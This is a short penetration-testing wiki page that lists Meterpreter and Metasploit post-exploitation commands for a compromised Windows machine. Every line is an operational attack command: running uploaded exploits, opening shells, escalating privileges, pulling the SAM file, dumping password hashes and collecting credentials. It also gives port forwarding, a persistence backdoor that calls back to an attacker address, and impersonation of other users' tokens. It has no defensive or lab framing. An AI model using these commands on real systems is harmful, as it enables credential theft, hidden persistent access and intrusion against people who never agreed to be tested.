Meterpreter

From pentestwiki.org

Useful commands:

Meterpreter upload file to Windows target:

meterpreter>upload file c:\\windows


Meterpreter download file from Windows target:

meterpreter>download c:\\windows\\repair\\sam /tmp


Meterpreter run .exe on target – handy for executing uploaded exploits:

meterpreter>execute -f c:\\windows\temp\exploit.exe


Creates new channel with cmd shell:

meterpreter>execute -f cmd -c


Meterpreter show processes:

meterpreter>ps


Meterpreter get shell on the target:

meterpreter>shell


Meterpreter attempts priviledge escalation the target:

meterpreter>getsystem


Meterpreter attempts to dump the hashes on the target:

meterpreter>hashdump


meterpreter>credcollect


Meterpreter create port forward to target machine:

meterpreter>portfwd add –l 3389 –p 3389 –r $IP


Meterpreter delete port forward:

meterpreter>portfwd delete –l 3389 –p 3389 –r $IP


Search excel files on target machine:

meterpreter>search -f *.xlsx


Get user id:

meterpreter>getuid


Check whether arch == meterpreter or migrate to x64 process!!

meterpreter>sysinfo



Identify other machines that the supplied domain user has administrative access to

msf>run post/windows/gather/local_admin_search_enum


msf>connect target port


Uses SSL:

msf>connect -s target port


Starts ruby shell:

msf>irb


msf>load pcap, wmap, nessus,..
msf>db_hosts
msf>db_vulns
msf>db_exploited


Meterpreter persistence mode

meterpreter>run persistence -U -i 5 -p 443 -r $IP


Impersonate any user

meterpreter>use incognito
meterpreter>list_tokens -u
meterpreter>impersonate_token MACHINE\\user
meterpreter>drop_token